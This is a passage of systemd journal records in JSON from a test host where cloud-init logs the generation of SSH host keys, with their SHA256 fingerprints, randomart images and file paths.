} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=84c15c05befb1e39", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=401634972dd94bba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[DSA 1024]----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a83f8735ae8f9030", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . .oo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=dbae0df9fa9d5f8e", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|..o o=.. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a516beba4bfef383", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.+. +.+ oE+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=45b99d8cac7df288", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo=oo= * = o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4b3fe0ad6ac79608", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|+=o+o.o S + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=9d48e74fac6405ae", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o.+. . 
= + o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bef29980580dbf8", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.o . . B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2aa;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8ac3dd8ded6f813a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . + . 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ab;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=69755eccf423747f", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ac;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ad;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8404d615c5ac7141", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ecdsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ae;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff1320d32445e830", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ecdsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2af;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5c01b1f22bbb1520", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ecdsa_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5750a197ed3e2276", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b912c77efc7e4919", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[ECDSA 256]---+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bb4603c042c98da", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| ...+oo|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7ee5b8e9f9dc40d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o B=|" } { "__CURSOR" : 
